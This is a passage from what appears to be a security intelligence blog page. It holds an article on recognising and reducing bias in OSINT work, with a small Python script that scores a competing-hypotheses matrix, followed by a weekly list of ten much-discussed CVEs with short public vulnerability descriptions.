Bias towards mainstream or high-visibility platforms can cause analysts to miss activity in fringe spaces where new narratives or tactics often emerge first.

Example:
While monitoring disinformation around an election, analysts focus on Facebook and YouTube but fail to detect early mobilisation efforts on fringe platforms like 4chan or niche messaging channels.

Impact:
Failure to detect early-stage planning or sentiment shifts can delay mitigation efforts and allow threats to escalate unchecked.


Reputational and Legal Risks

If an organisation bases public statements or internal actions on flawed OSINT, it could face reputational fallout — or worse, legal consequences.

Example:
A company issues a threat advisory naming a suspected actor based on an OSINT report later revealed to be based on misinterpreted data. The accused actor contests the findings publicly, leading to reputational damage and potential liability.

Impact:
Poorly substantiated claims can erode trust in your organisation’s intelligence capabilities and create significant legal exposure.


Analyst Burnout and Operational Inefficiency

Constantly chasing data that confirms a pre-existing view can lead to tunnel vision and missed insight. It also increases cognitive load, as analysts struggle to reconcile contradictory findings with an inflexible narrative.

Example:
An intelligence team spends weeks reinforcing an incorrect assumption because early findings were never challenged. Late-stage doubts lead to rework and missed deadlines.

Impact:
Bias drains time, undermines analyst confidence, and reduces the overall efficiency of the OSINT process.

By understanding and acknowledging these consequences, OSINT professionals can treat bias not just as a theoretical flaw but as a practical risk — one that can and should be actively mitigated. In the next section, we’ll explore how to do exactly that: recognising bias in your own process, and adopting safeguards to reduce its impact.


How to Identify and Mitigate Bias in OSINT Investigations

Tackling bias in OSINT isn’t about eliminating it entirely — that’s virtually impossible. Instead, the goal is to recognise where bias may creep in, actively question your assumptions, and build safeguards into your processes to keep your intelligence as accurate, balanced, and reliable as possible. Below are key strategies for identifying and mitigating bias throughout the OSINT lifecycle.

Develop Self-Awareness and Encourage Critical Thinking

Awareness is the first step. Bias is often unconscious, so analysts must learn to reflect on their own thought processes and remain open to challenge.

Tips:

  • Ask yourself: “What assumptions am I making here?”
  • Encourage peer review within your team — a second set of eyes can catch blind spots you might miss.
  • Maintain a mindset of curiosity over certainty. Avoid becoming too attached to an early hypothesis.

Use Structured Analytic Techniques (SATs)

Structured Analytic Techniques are proven tools to help analysts explore alternative explanations, test assumptions, and reduce cognitive traps.

Recommended techniques:

  • Analysis of Competing Hypotheses (ACH): List all possible explanations and evaluate evidence for and against each.
  • Red Teaming: Have a colleague deliberately challenge your assumptions and present counter-arguments.
  • Devil’s Advocacy: Take an opposing viewpoint to test the strength of your conclusions.

These methods are particularly valuable in high-stakes or high-uncertainty investigations where bias may have the greatest impact.
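To make the ACH step concrete, here is a small scoring matrix for the phishing-attribution scenario used earlier in the article. This is an added example, not the author's code; the hypotheses, evidence items, credibility weights and ratings are all constructed placeholders, and weighting inconsistencies by source credibility is an assumption of the example rather than part of Heuer's original method.

```python
"""Analysis of Competing Hypotheses (ACH) scoring matrix.

Added example for this article, not the author's own code. Hypotheses,
evidence and ratings are constructed placeholders, not a real investigation.
Following Heuer's ACH, each hypothesis is scored by the evidence that argues
*against* it (weighted here by source credibility, an assumption of this
example), and evidence that fits every hypothesis equally is non-diagnostic.
"""

# Constructed hypotheses for the phishing-attribution scenario in the article.
HYPOTHESES = ["H1 known ransomware gang", "H2 copycat group", "H3 false flag"]

# Constructed evidence: (id, description, credibility 1-10, rating per hypothesis).
# Ratings: "C" consistent, "I" inconsistent, "N" not applicable.
EVIDENCE = [
    ("E1", "lure template matches the gang's 2023 campaign", 9, ["C", "C", "C"]),
    ("E2", "C2 domains registered after the gang's last takedown", 8, ["I", "C", "C"]),
    ("E3", "ransom payments flow to wallets previously tied to the gang", 9, ["C", "I", "I"]),
    ("E4", "victim sectors do not match the gang's usual targeting", 7, ["I", "C", "C"]),
    ("E5", "tooling built from a publicly leaked builder", 8, ["N", "C", "C"]),
    ("E6", "no post-compromise activity beyond extortion", 5, ["C", "C", "I"]),
]


def inconsistency_scores(hypotheses=HYPOTHESES, evidence=EVIDENCE):
    """Credibility-weighted count of inconsistent evidence per hypothesis."""
    scores = {h: 0 for h in hypotheses}
    for _eid, _desc, credibility, ratings in evidence:
        for hypothesis, rating in zip(hypotheses, ratings):
            if rating == "I":
                scores[hypothesis] += credibility
    return scores


def rank_hypotheses(hypotheses=HYPOTHESES, evidence=EVIDENCE):
    """Hypotheses ordered from least to most contradicted (ties keep list order)."""
    scores = inconsistency_scores(hypotheses, evidence)
    return sorted(scores.items(), key=lambda item: item[1])


def diagnostic_evidence(evidence=EVIDENCE):
    """Ids of evidence whose rating differs between hypotheses. Items rated the
    same for every hypothesis (like E1) feel persuasive but cannot discriminate."""
    return [eid for eid, _desc, _cred, ratings in evidence if len(set(ratings)) > 1]


def pivotal_evidence(hypotheses=HYPOTHESES, evidence=EVIDENCE):
    """Ids of evidence whose removal changes the leading hypothesis.
    These are the items whose sourcing should be re-verified before publishing."""
    leader = rank_hypotheses(hypotheses, evidence)[0][0]
    pivotal = []
    for i, item in enumerate(evidence):
        remaining = evidence[:i] + evidence[i + 1:]
        if rank_hypotheses(hypotheses, remaining)[0][0] != leader:
            pivotal.append(item[0])
    return pivotal


if __name__ == "__main__":
    for hypothesis, score in rank_hypotheses():
        print(f"{score:>3}  {hypothesis}")
    print("diagnostic:", diagnostic_evidence())
    print("pivotal:", pivotal_evidence())
```

With this constructed data the copycat hypothesis is least contradicted, but the sensitivity check shows that conclusion rests entirely on E2 and E4, which is exactly where a reviewer should push back before the assessment is finalised.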

Diversify Sources and Tools

One of the most effective ways to reduce selection and tool bias is to cast a wide net. Avoid relying on a narrow set of familiar platforms or sources.

Tips:

  • Include mainstream, alternative, and fringe platforms in your data collection.
  • Use both commercial and open-source OSINT tools — each may present data differently.
  • Search in multiple languages where possible, or use translated queries to gain a broader view.

Regularly audit your sources and collection methods to ensure they remain appropriate for the task.

Separate Collection from Analysis

Where feasible, keep data collection and analysis distinct. This can help prevent your search strategy from being shaped by what you hope to find.

Tips:

  • Assign data gathering to one team member and analysis to another, if resources allow.
  • Use neutral search terms during collection to avoid biasing the dataset.
  • Create a clear intelligence requirement or question to guide your scope objectively.

This separation adds discipline to your workflow and supports a more neutral intelligence product.

Document Your Reasoning and Assumptions

Transparency in your process is essential — both for collaboration and for bias mitigation. Document how conclusions were reached, including what evidence was used, what was discarded, and why.

Benefits:

  • Makes your work more defensible in the event of challenge or scrutiny.
  • Helps you revisit past assessments to refine or revise conclusions with new evidence.
  • Supports better peer review and organisational learning.

Where possible, annotate your findings with source reliability ratings and confidence levels.

Build in Time for Reflection and Review

Tight deadlines often amplify bias, as there’s little opportunity to question results. Wherever possible, build in time to reflect on findings and review them with fresh eyes.

Tips:

  • Schedule a “cooling-off” period before finalising assessments, especially on complex or high-risk topics.
  • Use checklists to perform a final bias audit before dissemination.
  • Encourage cross-team or external feedback if time allows.

Bias in OSINT is inevitable — but it doesn’t have to define the quality of your work. With the right tools, habits, and organisational culture, it’s possible to create intelligence products that are more balanced, resilient, and actionable.

Embedding Bias Awareness into OSINT Workflows and Culture

Bias mitigation shouldn’t just be left to individual analysts — it must be baked into the wider workflows, processes, and culture of any team or organisation that relies on OSINT. When bias awareness becomes part of the operational fabric, the result is more reliable intelligence, better decision-making, and a stronger ethical foundation.


Here’s how teams can embed this mindset more broadly:

Establish Clear Intelligence Requirements

Start with a well-defined intelligence question. Vague or overly broad tasks increase the risk of confirmation bias or irrelevant collection.

What this looks like:

  • Define the “who, what, when, where, and why” before collection begins.
  • Break down large requests into smaller, more focused components.
  • Ensure tasking is reviewed and agreed by relevant stakeholders to reduce personal bias shaping direction.

Standardise Collection and Documentation Processes

Create workflows that encourage consistency and transparency at every stage of the OSINT cycle.

Steps to implement:

  • Use templates for reporting and note-taking that include fields for source evaluation, confidence levels, and assumptions.
  • Standardise how tools and sources are chosen and justify their use.
  • Make documentation a non-negotiable part of your intelligence output.

This not only reduces bias but also improves reproducibility and quality control.

Foster a Culture of Challenge and Peer Review

Healthy teams encourage respectful disagreement and regular feedback. Challenge should be seen not as confrontation, but as a key part of refining thinking.

How to build this in:

  • Hold regular review sessions or “intelligence stand-ups” where analysts discuss findings and alternative views.
  • Designate a “red team” or devil’s advocate role for larger projects.
  • Encourage cross-functional reviews involving technical, regional, or language specialists where possible.

Psychological safety — where analysts feel comfortable voicing concerns or dissent — is key to making this work.

Provide Ongoing Training and Awareness

Bias awareness isn’t a one-off exercise. Continuous professional development helps teams stay sharp, challenge assumptions, and stay updated with new tools or methods.

Training focus areas:

  • Cognitive bias and structured analytic techniques.
  • Source validation and reliability frameworks.
  • Diversity in online platforms and information ecosystems.

Don’t overlook the value of non-technical skills, such as critical thinking, logic, and media literacy.

Use Technology Thoughtfully, Not Blindly

Automated tools can speed up analysis, but they can also entrench bias if they’re not used carefully. Algorithms are only as objective as the data and assumptions behind them.

Best practices:

  • Understand the limitations of any tool, especially those that involve language processing, sentiment analysis, or trend detection.
  • Regularly assess whether tools introduce their own selection bias (e.g. geolocation limits, language barriers).
  • Avoid over-reliance on dashboards or outputs without context — always layer automated findings with human judgment.

Reflect and Evolve

Build regular retrospectives into your team’s rhythm. Reflect on where bias may have influenced past projects, and use that to refine future practice.

Prompts to consider:

  • Were any key perspectives or sources missed?
  • Were assumptions tested adequately?
  • How did the team handle dissent or uncertainty?

This institutional learning helps embed bias mitigation into your organisational muscle memory.

By putting these cultural and procedural supports in place, organisations move beyond individual effort and towards systemic resilience. When bias awareness becomes a shared value — not just a box-ticking exercise — the result is a more ethical, accurate, and credible OSINT function.


The Value of Bias-Aware OSINT

Bias is an unavoidable part of human thinking, and by extension, of open-source intelligence. But acknowledging its presence isn’t a weakness — it’s a strength. When analysts and organisations recognise where bias can occur and actively work to reduce its influence, the result is not only better intelligence but also more ethical, credible, and impactful work.

Bias-aware OSINT isn’t about striving for some mythical state of total objectivity. Instead, it’s about developing good habits: questioning assumptions, diversifying sources, documenting reasoning, and creating space for challenge and reflection. It’s about embedding checks and balances into both individual workflows and team culture.

In an era where misinformation spreads quickly and decision-makers rely heavily on timely, accurate information, the stakes for getting OSINT right have never been higher. Building bias-aware practices into your investigations isn’t just good tradecraft — it’s an essential part of being a responsible intelligence professional.

By staying curious, critical, and collaborative, we can all do our part to ensure the intelligence we produce stands up to scrutiny and serves its intended purpose — helping others make better-informed decisions.

Header photo by Christian Lue on Unsplash.

CVE Top 10

The SOS Intelligence CVE Chatter Weekly Top Ten – 05 May 2025

This weekly blog post is compiled from our unique intelligence collection pipelines. We are your eyes and ears online, including on the Dark Web.

There are thousands of vulnerability discussions each week. SOS Intelligence gathers a list of the most discussed Common Vulnerabilities and Exposures (CVE) online for the previous week.

We make every effort to ensure the accuracy of the data presented. As this is an automated process some errors may creep in.

If you are feeling generous, please do make us aware of anything you spot: feel free to follow us on Twitter @sosintel and DM us. Thank you!

1. CVE-2018-17144

Bitcoin Core 0.14.x before 0.14.3, 0.15.x before 0.15.2, and 0.16.x before 0.16.3 and Bitcoin Knots 0.14.x through 0.16.x before 0.16.3 allow a remote denial of service (application crash) exploitable by miners via duplicate input. An attacker can make bitcoind or Bitcoin-Qt crash.

https://nvd.nist.gov/vuln/detail/CVE-2018-17144

2. CVE-2024-21060

Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Data Dictionary). Supported versions that are affected are 8.0.36 and prior and 8.3.0 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).

https://nvd.nist.gov/vuln/detail/CVE-2024-21060

3. CVE-2024-10687

The Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons plugin for WordPress is vulnerable to time-based SQL Injection via the $collectedIds parameter in all versions up to, and including, 24.0.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

https://nvd.nist.gov/vuln/detail/CVE-2024-10687

4. CVE-2022-32666

In Wi-Fi, there is a possible low throughput due to misrepresentation of critical information. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: GN20220829014; Issue ID: GN20220829014.

https://nvd.nist.gov/vuln/detail/CVE-2022-32666

5. CVE-2021-32789

woocommerce-gutenberg-products-block is a feature plugin for WooCommerce Gutenberg Blocks. An SQL injection vulnerability impacts all WooCommerce sites running the WooCommerce Blocks feature plugin between version 2.5.0 and prior to version 2.5.16. Via a carefully crafted URL, an exploit can be executed against the `wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]` endpoint that allows the execution of a read only sql query. There are patches for many versions of this package, starting with version 2.5.16. There are no known workarounds aside from upgrading.

https://nvd.nist.gov/vuln/detail/CVE-2021-32789

6. CVE-2025-2783

Incorrect handle provided in unspecified circumstances in Mojo in Google Chrome on Windows prior to 134.0.6998.177 allowed a remote attacker to perform a sandbox escape via a malicious file. (Chromium security severity: High)

https://nvd.nist.gov/vuln/detail/CVE-2025-2783

7. CVE-2025-1323

The WP-Recall – Registration, Profile, Commerce & More plugin for WordPress is vulnerable to SQL Injection via the ‘databeat’ parameter in all versions up to, and including, 16.26.10 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

https://nvd.nist.gov/vuln/detail/CVE-2025-1323

8. CVE-2025-32658

Deserialization of Untrusted Data vulnerability in wpWax HelpGent allows Object Injection. This issue affects HelpGent: from n/a through 2.2.4.

https://nvd.nist.gov/vuln/detail/CVE-2025-32658

9. CVE-2025-39462

Improper Control of Filename for Include/Require Statement in PHP Program (‘PHP Remote File Inclusion’) vulnerability in teamzt Smart Agreements allows PHP Local File Inclusion. This issue affects Smart Agreements: from n/a through 1.0.3.

https://nvd.nist.gov/vuln/detail/CVE-2025-39462

10. CVE-2024-3400

A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.

Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.

https://nvd.nist.gov/vuln/detail/CVE-2024-3400